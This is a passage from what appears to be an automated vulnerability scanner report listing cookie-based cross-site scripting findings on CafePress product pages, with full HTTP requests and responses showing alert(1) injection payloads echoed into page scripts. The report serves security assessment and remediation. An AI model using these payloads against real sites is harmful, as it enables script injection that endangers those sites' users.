GET /+womens-tank-tops HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAec3ed"-alert(1)-"6cdf0b2af4a ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 61745 Date: Sun, 26 Dec 2010 13:46:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:48 GMT; path=/ Set-Cookie: cp_sc=100093; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:48 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 61745 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAec3ed"-alert(1)-"6cdf0b2af4a "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.73. http://www.cafepress.com/+womens-tank-tops [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+womens-tank-tops
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae66d</script><script>alert(1)</script>eabb41eb2b2 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+womens-tank-tops HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=ae66d</script><script>alert(1)</script>eabb41eb2b2 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 59702 Date: Sun, 26 Dec 2010 13:46:42 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:42 GMT; path=/ Set-Cookie: cp_sc=100093; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:42 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59702 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'ae66d</script><script>alert(1)</script>eabb41eb2b2 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.74. http://www.cafepress.com/+womens-thongs [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+womens-thongs
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d1e3"-alert(1)-"b1f51daa56d was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+womens-thongs HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA5d1e3"-alert(1)-"b1f51daa56d ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 59312 Date: Sun, 26 Dec 2010 13:47:25 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:25 GMT; path=/ Set-Cookie: cp_sc=100115; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:25 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59312 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA5d1e3"-alert(1)-"b1f51daa56d "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.75. http://www.cafepress.com/+womens-thongs [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+womens-thongs
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b983</script><script>alert(1)</script>ebe8ab7f2c6 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+womens-thongs HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=5b983</script><script>alert(1)</script>ebe8ab7f2c6 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59334 Date: Sun, 26 Dec 2010 13:47:23 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:23 GMT; path=/ Set-Cookie: cp_sc=100115; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:23 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59334 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '5b983</script><script>alert(1)</script>ebe8ab7f2c6 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.76. http://www.cafepress.com/+yoga-mats [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+yoga-mats
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa7a8"-alert(1)-"e7fc2e4ad80 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+yoga-mats HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAfa7a8"-alert(1)-"e7fc2e4ad80 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 59513 Date: Sun, 26 Dec 2010 13:49:05 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:05 GMT; path=/ Set-Cookie: cp_sc=201675; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:05 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59513 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAfa7a8"-alert(1)-"e7fc2e4ad80 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.77. http://www.cafepress.com/+yoga-mats [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+yoga-mats
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f3e8</script><script>alert(1)</script>edf8d16990b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+yoga-mats HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=4f3e8</script><script>alert(1)</script>edf8d16990b ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; 